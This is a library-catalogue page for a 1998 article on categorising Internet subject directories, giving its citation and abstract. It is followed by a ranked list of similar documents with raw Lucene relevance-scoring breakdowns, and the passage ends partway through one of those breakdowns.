[ null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/541e45cebee0ac09b61110f6dff99a951d3c4e2a", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/d0096fb78d6843c9fb67a840dc796b61ad93eec2", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/2f461e54f5c093e92a55547b9764291390f0b5d0", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/b2702450f0458a5e01a698e248af552a7fab2b50", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c2bf0c740a5cee64571cee412b16c1d4250ba504", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/2f461e54f5c093e92a55547b9764291390f0b5d0", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/a601995d55609f2d9f5e233e36fbe9ea26011b3b", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/e1d007888875e2294ff7ef04b13349b27ec46e5a", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c35adc8715c440af374761683692c18e2c22304c", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/8aa255b90c7763e72245ddbd5461c022b0aeac34", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/7c87b228b9a0db910ffa622d7f417de3fa64258a", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/aec8b4a90a361574bced206cb9f5dcbd11b94b28", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/087a34835d10d288ebfaa7b78b5c4bec1bad1fb7", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/b40ef47ea1778c614bd919ece60cbde503cb370a", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/b5fd7784c1f2486832ba1038c4351d882716be5d", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c3837cad72483d97bcdde49c85d3b7b859fb3fd2", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/acf0552b7db0dd623a0ba876e0574bbe3351c4e2", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/9fd47b2a39f7a7856952afec1f1db72c67af6161", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/24b0d5ca6f381068d756f6337c08e0af9d1eeb6f", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/f8d589e8c3519ebd95d43ddd52a8ad9ba5fdd473", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93549055,"math_prob":0.96041113,"size":7273,"snap":"2022-40-2023-06","text_gpt3_token_len":1455,"char_repetition_ratio":0.13880864,"word_repetition_ratio":0.021168502,"special_character_ratio":0.19139282,"punctuation_ratio":0.084033616,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9971996,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40],"im_url_duplicate_count":[null,4,null,null,null,null,null,null,null,4,null,null,null,null,null,null,null,4,null,null,null,null,null,8,null,8,null,8,null,9,null,null,null,9,null,null,null,null,null,9,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-03T02:11:19Z\",\"WARC-Record-ID\":\"<urn:uuid:1a0036a7-bd49-4520-b3ab-01a01d0b63d2>\",\"Content-Length\":\"129848\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c10ee4b5-1fe1-4e15-8b1d-c6e166b8d718>\",\"WARC-Concurrent-To\":\"<urn:uuid:e4e42279-95cd-4035-bf2c-b05eed5ce243>\",\"WARC-IP-Address\":\"99.84.109.143\",\"WARC-Target-URI\":\"https://db0nus869y26v.cloudfront.net/en/Arbitrage_pricing_theory\",\"WARC-Payload-Digest\":\"sha1:UXAFL4AOQ57Q425KNRJYHP3ZHXP2NZ2E\",\"WARC-Block-Digest\":\"sha1:JR3EAUKPNHOZ3JWWLNVPH7YVVCWTLWXU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337371.9_warc_CC-MAIN-20221003003804-20221003033804-00754.warc.gz\"}"}
https://math.hecker.org/2011/09/02/linear-algebra-and-its-applications-exercise-2-2-12/
[ "## Linear Algebra and Its Applications, Exercise 2.2.12\n\nExercise 2.2.12. What is a 2 by 3 system of equations", null, "$Ax = b$ that has the following general solution?", null, "$x = \\begin{bmatrix} 1 \\\\ 1 \\\\ 0 \\end{bmatrix} + w \\begin{bmatrix} 1 \\\\ 2 \\\\ 1 \\end{bmatrix}$\n\nAnswer: The general solution above is the sum of a particular solution and a homogeneous solution, where", null, "$x_{particular} = \\begin{bmatrix} 1 \\\\ 1 \\\\ 0 \\end{bmatrix}$\n\nand", null, "$x_{homogeneous} = w \\begin{bmatrix} 1 \\\\ 2 \\\\ 1 \\end{bmatrix}$\n\nSince", null, "$w$ is the only variable referenced in the homogeneous solution it must be the only free variable, with", null, "$u$ and", null, "$v$ being basic. Since", null, "$u$ is basic we must have a pivot in column 1, and since", null, "$v$ is basic we must have a second pivot in column 2. After performing elimination on", null, "$A$ the resulting echelon matrix", null, "$U$ must therefore have the form", null, "$U = \\begin{bmatrix} *&*&* \\\\ 0&*&* \\end{bmatrix}$\n\nTo simplify solving the problem we can assume that", null, "$A$ also has this form; in other words, we assume that", null, "$A$ is already in echelon form and thus we don’t need to carry out elimination. The matrix", null, "$A$ then has the form", null, "$A = \\begin{bmatrix} a_{11}&a_{12}&a_{13} \\\\ 0&a_{22}&a_{23} \\end{bmatrix}$\n\nwhere", null, "$a_{11}$ and", null, "$a_{22}$ are nonzero (because they are pivots).\n\nWe then have", null, "$Ax_{homogeneous} = \\begin{bmatrix} a_{11}&a_{12}&a_{13} \\\\ 0&a_{22}&a_{23} \\end{bmatrix} w \\begin{bmatrix} 1 \\\\ 2 \\\\ 1 \\end{bmatrix} = 0$\n\nIf we assume that", null, "$w$ is 1 and express the right-hand side in matrix form this then becomes", null, "$\\begin{bmatrix} a_{11}&a_{12}&a_{13} \\\\ 0&a_{22}&a_{23} \\end{bmatrix} \\begin{bmatrix} 1 \\\\ 2 \\\\ 1 \\end{bmatrix} = \\begin{bmatrix} 0 \\\\ 0 \\end{bmatrix}$\n\nor (expressed as a system of equations)", null, "$\\setlength\\arraycolsep{0.2em}\\begin{array}{rcrcrcl}a_{11}&+&2a_{12}&+&a_{13}&=&0 \\\\ &&2a_{22}&+&a_{23}&=&0 \\end{array}$\n\nThe pivot", null, "$a_{11}$ must be nonzero, and we arbitrarily assume that", null, "$a_{11} = 1$. We can then satisfy the first equation by assigning", null, "$a_{12} = 0$ and", null, "$a_{13} = -1$. The pivot", null, "$a_{22}$ must also be nonzero, and we arbitrarily assume that", null, "$a_{22} = 1$ as well. We can then satisfy the second equation by assigning", null, "$a_{23} = -2$. Our proposed value of", null, "$A$ is then", null, "$A = \\begin{bmatrix} 1&0&-1 \\\\ 0&1&-2 \\end{bmatrix}$\n\nso that we have", null, "$Ax_{homogeneous} = \\begin{bmatrix} 1&0&-1 \\\\ 0&1&-2 \\end{bmatrix} \\begin{bmatrix} 1 \\\\ 2 \\\\ 1 \\end{bmatrix} = \\begin{bmatrix} 0 \\\\ 0 \\end{bmatrix}$\n\nas required.\n\nWe next turn to the general system", null, "$Ax = b$. We now have a value for", null, "$A$, and we were given the value of the particular solution. 
We can multiply the two to calculate the value of", null, "$b$:", null, "$b = Ax_{particular} = \\begin{bmatrix} 1&0&-1 \\\\ 0&1&-2 \\end{bmatrix} \\begin{bmatrix} 1 \\\\ 1 \\\\ 0 \\end{bmatrix} = \\begin{bmatrix} 1 \\\\ 1 \\end{bmatrix}$\n\nThis gives us the following as an example 2 by 3 system that has the general solution specified above:", null, "$\\begin{bmatrix} 1&0&-1 \\\\ 0&1&-2 \\end{bmatrix} \\begin{bmatrix} u \\\\ v \\\\ w \\end{bmatrix} = \\begin{bmatrix} 1 \\\\ 1 \\end{bmatrix}$\n\nor", null, "$\\setlength\\arraycolsep{0.2em}\\begin{array}{rcrcrcl}u&&&-&w&=&1 \\\\ &&v&-&2w&=&1 \\end{array}$\n\nFinally, note that the solution provided for exercise 2.2.12 at the end of the book is incorrect. The right-hand side must be a 2 by 1 matrix and not a 3 by 1 matrix, so the final value of 0 in the right-hand side should not be present.\n\nNOTE: This continues a series of posts containing worked out exercises from the (out of print) book Linear Algebra and Its Applications, Third Edition", null, "by Gilbert Strang.\n\nIf you find these posts useful I encourage you to also check out the more current Linear Algebra and Its Applications, Fourth Edition", null, ", Dr Strang’s introductory textbook Introduction to Linear Algebra, Fourth Edition", null, "and the accompanying free online course, and Dr Strang’s other books", null, ".\n\nThis entry was posted in linear algebra. Bookmark the permalink.\n\n### 2 Responses to Linear Algebra and Its Applications, Exercise 2.2.12\n\n1.", null, "Daniel says:\n\nI think that your final note is incorrect, due to the fact that if you find the general solution for the system Ax=b that you found, you’ll have to write the solution like Strang does it in (3) page (76). There are three entries on the solution because “x” vector lenght. The general solution (in Matlab notation) is x = [u; v; w] = [1+w; 1+2w; w]= [1; 1; 0] + w*[1; 2; 1]. The general solution he proposed at the begining of the exercise\n\n•", null, "hecker says:\n\nMy apologies for the delay in responding. Are you referring to my final sentence about the solution to exercise 2.2.12 given on page 476 in the back of the book? If so, I think I may have confused you. I am *not* saying that Strang wrote the general solution incorrectly in the statement of the exercise on page 79, or that Strang found an incorrect solution to the exercise.\n\nRather my point is as follows: In the statement of the solution on page 476 Strang shows as a solution the same 2 by 3 matrix that I derived above, and Strang shows that 2 by 3 matrix multiplying the vector (u, v, w) just as I do above, representing a system of two equations in three unknowns. However on the right-hand side Strang shows that 2 by 3 matrix multiplying the vector (u, v, w) to produce the vector (1, 1, 0). This cannot be: since the matrix has only two rows, that multiplication would produce a vector with only two elements, not three (as in the book). Those two elements represent the right-hand sides of the corresponding system of two equations.\n\nSo the left-hand side in the solution of 2.2.12 on page 476 is correct, but the right-hand side of the solution of 2.2.12 on page 476, namely the vector (1, 1, 0), is not. Instead the right-hand side should be the vector (1, 1) as I derived above." ]
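As a quick check on the worked exercise quoted above, the matrix and right-hand side found there do reproduce the stated general solution for every value of $w$, since multiplying out both pieces gives

```latex
A\bigl(x_{particular} + w\,x_{homogeneous}\bigr)
  = \begin{bmatrix} 1 & 0 & -1 \\ 0 & 1 & -2 \end{bmatrix}
    \begin{bmatrix} 1 \\ 1 \\ 0 \end{bmatrix}
  + w \begin{bmatrix} 1 & 0 & -1 \\ 0 & 1 & -2 \end{bmatrix}
    \begin{bmatrix} 1 \\ 2 \\ 1 \end{bmatrix}
  = \begin{bmatrix} 1 \\ 1 \end{bmatrix} + w \begin{bmatrix} 0 \\ 0 \end{bmatrix}
  = b ,
```

which is also consistent with the 2-by-1 right-hand side argued for in the comment thread.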
[ null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "http://www.assoc-amazon.com/e/ir", null, "http://www.assoc-amazon.com/e/ir", null, "http://www.assoc-amazon.com/e/ir", null, "https://www.assoc-amazon.com/e/ir", null, "https://1.gravatar.com/avatar/75961bbe2e9b512d68f5098e73fd804e", null, "https://2.gravatar.com/avatar/523287496a16cae22d6337ab1aae4491", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9437545,"math_prob":0.9995622,"size":3926,"snap":"2021-43-2021-49","text_gpt3_token_len":928,"char_repetition_ratio":0.1409995,"word_repetition_ratio":0.05,"special_character_ratio":0.23942944,"punctuation_ratio":0.10722891,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.999853,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-20T07:43:58Z\",\"WARC-Record-ID\":\"<urn:uuid:ff3c4240-48d4-490e-b9a9-662b196f5ea6>\",\"Content-Length\":\"86576\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b0079333-b548-47eb-a245-e520b02ff91a>\",\"WARC-Concurrent-To\":\"<urn:uuid:fd834d6e-65f7-4267-bc03-ab6867ea2e68>\",\"WARC-IP-Address\":\"192.0.78.13\",\"WARC-Target-URI\":\"https://math.hecker.org/2011/09/02/linear-algebra-and-its-applications-exercise-2-2-12/\",\"WARC-Payload-Digest\":\"sha1:DRM75Q62OUGFIMDTRCCJXU647BXZ5JGC\",\"WARC-Block-Digest\":\"sha1:HZ3PFQ2KZ73EO46C6Y5BJ47OKZS73O4B\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585302.91_warc_CC-MAIN-20211020055136-20211020085136-00716.warc.gz\"}"}
https://diffgeom.subwiki.org/wiki/Flat_connection
[ "# Flat connection\n\n## Definition\n\n### Symbol-free definition\n\nA connection on a vector bundle over a differential manifold is said to be flat or integrable or curvature-free or locally flat if the curvature of the connection is zero everywhere.\n\n### Definition with symbols\n\nA connection", null, "$\\nabla$ on a vector bundle", null, "$E$ over a differential manifold", null, "$M$ is said to be flat or integrable or curvature-free or locally flat if the curvature form vanishes identically, viz for any vector fields", null, "$X$ and", null, "$Y$:", null, "$R(X,Y) = \\nabla_X\\nabla_Y - \\nabla_Y\\nabla_X - \\nabla_{[X,Y]} = 0$\n\n### Definition in local coordinates\n\nIn local coordinates, we require that the curvature matrix should vanish identically; in other words:", null, "$\\Omega := d\\omega + \\omega \\wedge \\omega = 0$\n\nwhere", null, "$\\omega$ is the matrix of connection forms.\n\n### Alternative definitions\n\nFurther information: Flat connection equals module structure over differential operators\n\nRecall that one alternative view of a connection is as giving the space of sections", null, "$\\Gamma(E)$ the structure of a module over the connection algebra of", null, "$M$. Equivalently, it is a way of giving the sheaf of sections", null, "$\\mathcal{E}$ the structure of a sheaf-theoretic module over the sheaf of connection algebras.\n\nThe connection is flat if and only if this descends to a module structure over the sheaf of differential operators. In other words, a flat connection is equivalent to a structure of", null, "$\\mathcal{E}$ as a module over the sheaf of differential operators." ]
[ null, "https://diffgeom.subwiki.org/w/images/math/f/e/3/fe3a83e41074834731743ab803cd4936.png ", null, "https://diffgeom.subwiki.org/w/images/math/3/a/3/3a3ea00cfc35332cedf6e5e9a32e94da.png ", null, "https://diffgeom.subwiki.org/w/images/math/6/9/6/69691c7bdcc3ce6d5d8a1361f22d04ac.png ", null, "https://diffgeom.subwiki.org/w/images/math/0/2/1/02129bb861061d1a052c592e2dc6b383.png ", null, "https://diffgeom.subwiki.org/w/images/math/5/7/c/57cec4137b614c87cb4e24a3d003a3e0.png ", null, "https://diffgeom.subwiki.org/w/images/math/7/6/d/76d3a555197a6dcfbc2de8dde203870b.png ", null, "https://diffgeom.subwiki.org/w/images/math/d/0/a/d0a85ea60462aa5f487a2b489dbf4382.png ", null, "https://diffgeom.subwiki.org/w/images/math/4/d/1/4d1b7b74aba3cfabd624e898d86b4602.png ", null, "https://diffgeom.subwiki.org/w/images/math/a/5/9/a59f9c03407cf39ca2dc9bff9d1935ef.png ", null, "https://diffgeom.subwiki.org/w/images/math/6/9/6/69691c7bdcc3ce6d5d8a1361f22d04ac.png ", null, "https://diffgeom.subwiki.org/w/images/math/d/3/c/d3c305fc416b971cd6d284564e51bf85.png ", null, "https://diffgeom.subwiki.org/w/images/math/d/3/c/d3c305fc416b971cd6d284564e51bf85.png ", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85957897,"math_prob":0.9979682,"size":1275,"snap":"2019-51-2020-05","text_gpt3_token_len":245,"char_repetition_ratio":0.15735641,"word_repetition_ratio":0.26130652,"special_character_ratio":0.17254902,"punctuation_ratio":0.06392694,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99369276,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,10,null,9,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-16T05:40:04Z\",\"WARC-Record-ID\":\"<urn:uuid:27aa3d00-bd89-4ace-b934-84d950e674bc>\",\"Content-Length\":\"21528\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7761c904-d981-403e-bad2-7d48fe8e755a>\",\"WARC-Concurrent-To\":\"<urn:uuid:acdbab23-27ed-4cc4-94f8-01d5d2ddfb80>\",\"WARC-IP-Address\":\"96.126.114.7\",\"WARC-Target-URI\":\"https://diffgeom.subwiki.org/wiki/Flat_connection\",\"WARC-Payload-Digest\":\"sha1:NJSXL66ESLVCUELDQSIJ3JYYPYQD2JCJ\",\"WARC-Block-Digest\":\"sha1:4HWPJXQCADBFZLR43DK3MODTIWTUHGLA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575541317967.94_warc_CC-MAIN-20191216041840-20191216065840-00219.warc.gz\"}"}
http://ixtrieve.fh-koeln.de/birds/litie/document/21752
[ "# Document (#21752)\n\nAuthor\nGandhi, S.\nTitle\nProliferation and categories of Internet directories : a database of Internet subject directories\nSource\nReference and user services quarterly. 37(1998) no.4, S.319-331\nYear\n1998\nAbstract\nReviews the exponential growth of Internet resources leading to the emergence of hundreds of Internet directories to organize those resources. Based upon their format, content, and characteristics, these Internet directories are categorized into 8 groups. From one of these groups. 'Subject directories published in professional journals' all published Internet directories are identified and listed in detail. Using Paradox-For-Windows, a comprehensive database of more than 350 of these directories was developed. Analyzes and interprets the data contained in the database and reviews the strengths and weaknesses of print Internet subject directories as compared to online directories and other search engines\nTheme\nInternet\nInformationsmittel\n\n## Similar documents (content)\n\n1. Notess, G.R.: Comparing net directories (1997) 0.26\n```0.26219296 = sum of:\n0.26219296 = product of:\n1.3109648 = sum of:\n0.04439732 = weight(abstract_txt:resources in 528) [ClassicSimilarity], result of:\n0.04439732 = score(doc=528,freq=1.0), product of:\n0.06723249 = queryWeight, product of:\n1.4285944 = boost\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.011135577 = queryNorm\n0.66035515 = fieldWeight in 528, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.15625 = fieldNorm(doc=528)\n0.100582086 = weight(abstract_txt:reviews in 528) [ClassicSimilarity], result of:\n0.100582086 = score(doc=528,freq=2.0), product of:\n0.09204745 = queryWeight, product of:\n1.6715724 = boost\n4.945086 = idf(docFreq=826, maxDocs=42740)\n0.011135577 = queryNorm\n1.0927199 = fieldWeight in 528, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n4.945086 = idf(docFreq=826, maxDocs=42740)\n0.15625 = fieldNorm(doc=528)\n0.0745869 = weight(abstract_txt:subject in 528) [ClassicSimilarity], result of:\n0.0745869 = score(doc=528,freq=2.0), product of:\n0.08632504 = queryWeight, product of:\n1.982592 = boost\n3.9101257 = idf(docFreq=2327, maxDocs=42740)\n0.011135577 = queryNorm\n0.86402386 = fieldWeight in 528, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.9101257 = idf(docFreq=2327, maxDocs=42740)\n0.15625 = fieldNorm(doc=528)\n0.104782976 = weight(abstract_txt:internet in 528) [ClassicSimilarity], result of:\n0.104782976 = score(doc=528,freq=1.0), product of:\n0.18094969 = queryWeight, product of:\n4.384623 = boost\n3.7060635 = idf(docFreq=2854, maxDocs=42740)\n0.011135577 = queryNorm\n0.5790724 = fieldWeight in 528, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.7060635 = idf(docFreq=2854, maxDocs=42740)\n0.15625 = fieldNorm(doc=528)\n0.9866156 = weight(abstract_txt:directories in 528) [ClassicSimilarity], result of:\n0.9866156 = score(doc=528,freq=1.0), product of:\n0.87735933 = queryWeight, product of:\n10.947484 = boost\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.011135577 = queryNorm\n1.1245285 = fieldWeight in 528, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.15625 = fieldNorm(doc=528)\n0.2 = coord(5/25)\n```\n2. 
Boettcher, J.; Kingma, B.R.: Telephone directories : alternatives to print (1994) 0.21\n```0.2071013 = sum of:\n0.2071013 = product of:\n1.2943832 = sum of:\n0.039925013 = weight(abstract_txt:emergence in 1781) [ClassicSimilarity], result of:\n0.039925013 = score(doc=1781,freq=1.0), product of:\n0.07891896 = queryWeight, product of:\n1.0944477 = boost\n6.475505 = idf(docFreq=178, maxDocs=42740)\n0.011135577 = queryNorm\n0.50589883 = fieldWeight in 1781, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n6.475505 = idf(docFreq=178, maxDocs=42740)\n0.078125 = fieldNorm(doc=1781)\n0.031393647 = weight(abstract_txt:resources in 1781) [ClassicSimilarity], result of:\n0.031393647 = score(doc=1781,freq=2.0), product of:\n0.06723249 = queryWeight, product of:\n1.4285944 = boost\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.011135577 = queryNorm\n0.4669416 = fieldWeight in 1781, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.078125 = fieldNorm(doc=1781)\n0.014712053 = weight(abstract_txt:these in 1781) [ClassicSimilarity], result of:\n0.014712053 = score(doc=1781,freq=1.0), product of:\n0.05850244 = queryWeight, product of:\n1.6321194 = boost\n3.2189133 = idf(docFreq=4646, maxDocs=42740)\n0.011135577 = queryNorm\n0.2514776 = fieldWeight in 1781, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.2189133 = idf(docFreq=4646, maxDocs=42740)\n0.078125 = fieldNorm(doc=1781)\n1.2083524 = weight(abstract_txt:directories in 1781) [ClassicSimilarity], result of:\n1.2083524 = score(doc=1781,freq=6.0), product of:\n0.87735933 = queryWeight, product of:\n10.947484 = boost\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.011135577 = queryNorm\n1.3772606 = fieldWeight in 1781, product of:\n2.4494898 = tf(freq=6.0), with freq of:\n6.0 = termFreq=6.0\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.078125 = fieldNorm(doc=1781)\n0.16 = coord(4/25)\n```\n3. 
Chen, S.Y.; Magoulas, G.D.; Dimakopoulos, D.: ¬A flexible interface design for Web directories to accommodate different cognitive styles (2005) 0.16\n```0.16450445 = sum of:\n0.16450445 = product of:\n0.8225223 = sum of:\n0.02219866 = weight(abstract_txt:resources in 4270) [ClassicSimilarity], result of:\n0.02219866 = score(doc=4270,freq=1.0), product of:\n0.06723249 = queryWeight, product of:\n1.4285944 = boost\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.011135577 = queryNorm\n0.33017758 = fieldWeight in 4270, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.078125 = fieldNorm(doc=4270)\n0.020805985 = weight(abstract_txt:these in 4270) [ClassicSimilarity], result of:\n0.020805985 = score(doc=4270,freq=2.0), product of:\n0.05850244 = queryWeight, product of:\n1.6321194 = boost\n3.2189133 = idf(docFreq=4646, maxDocs=42740)\n0.011135577 = queryNorm\n0.35564303 = fieldWeight in 4270, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.2189133 = idf(docFreq=4646, maxDocs=42740)\n0.078125 = fieldNorm(doc=4270)\n0.05550465 = weight(abstract_txt:groups in 4270) [ClassicSimilarity], result of:\n0.05550465 = score(doc=4270,freq=2.0), product of:\n0.098303944 = queryWeight, product of:\n1.7274472 = boost\n5.1103826 = idf(docFreq=700, maxDocs=42740)\n0.011135577 = queryNorm\n0.5646228 = fieldWeight in 4270, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n5.1103826 = idf(docFreq=700, maxDocs=42740)\n0.078125 = fieldNorm(doc=4270)\n0.02637045 = weight(abstract_txt:subject in 4270) [ClassicSimilarity], result of:\n0.02637045 = score(doc=4270,freq=1.0), product of:\n0.08632504 = queryWeight, product of:\n1.982592 = boost\n3.9101257 = idf(docFreq=2327, maxDocs=42740)\n0.011135577 = queryNorm\n0.30547857 = fieldWeight in 4270, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.9101257 = idf(docFreq=2327, maxDocs=42740)\n0.078125 = fieldNorm(doc=4270)\n0.69764256 = weight(abstract_txt:directories in 4270) [ClassicSimilarity], result of:\n0.69764256 = score(doc=4270,freq=2.0), product of:\n0.87735933 = queryWeight, product of:\n10.947484 = boost\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.011135577 = queryNorm\n0.7951617 = fieldWeight in 4270, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.078125 = fieldNorm(doc=4270)\n0.2 = coord(5/25)\n```\n4. 
Notess, G.R.: Internet ready reference resources (1996) 0.16\n```0.1635546 = sum of:\n0.1635546 = product of:\n1.362955 = sum of:\n0.05327679 = weight(abstract_txt:resources in 4968) [ClassicSimilarity], result of:\n0.05327679 = score(doc=4968,freq=1.0), product of:\n0.06723249 = queryWeight, product of:\n1.4285944 = boost\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.011135577 = queryNorm\n0.7924262 = fieldWeight in 4968, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.1875 = fieldNorm(doc=4968)\n0.12573957 = weight(abstract_txt:internet in 4968) [ClassicSimilarity], result of:\n0.12573957 = score(doc=4968,freq=1.0), product of:\n0.18094969 = queryWeight, product of:\n4.384623 = boost\n3.7060635 = idf(docFreq=2854, maxDocs=42740)\n0.011135577 = queryNorm\n0.6948869 = fieldWeight in 4968, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.7060635 = idf(docFreq=2854, maxDocs=42740)\n0.1875 = fieldNorm(doc=4968)\n1.1839386 = weight(abstract_txt:directories in 4968) [ClassicSimilarity], result of:\n1.1839386 = score(doc=4968,freq=1.0), product of:\n0.87735933 = queryWeight, product of:\n10.947484 = boost\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.011135577 = queryNorm\n1.3494341 = fieldWeight in 4968, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.1875 = fieldNorm(doc=4968)\n0.12 = coord(3/25)\n```\n5. MacLeod, D.: ¬The Internet, LEXIS, and WESTLAW : a comparison of resources for the legal researcher (1996) 0.16\n```0.1589028 = sum of:\n0.1589028 = product of:\n0.9931425 = sum of:\n0.049783777 = weight(abstract_txt:leading in 4789) [ClassicSimilarity], result of:\n0.049783777 = score(doc=4789,freq=1.0), product of:\n0.06683387 = queryWeight, product of:\n1.0071696 = boost\n5.959108 = idf(docFreq=299, maxDocs=42740)\n0.011135577 = queryNorm\n0.7448885 = fieldWeight in 4789, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.959108 = idf(docFreq=299, maxDocs=42740)\n0.125 = fieldNorm(doc=4789)\n0.035517856 = weight(abstract_txt:resources in 4789) [ClassicSimilarity], result of:\n0.035517856 = score(doc=4789,freq=1.0), product of:\n0.06723249 = queryWeight, product of:\n1.4285944 = 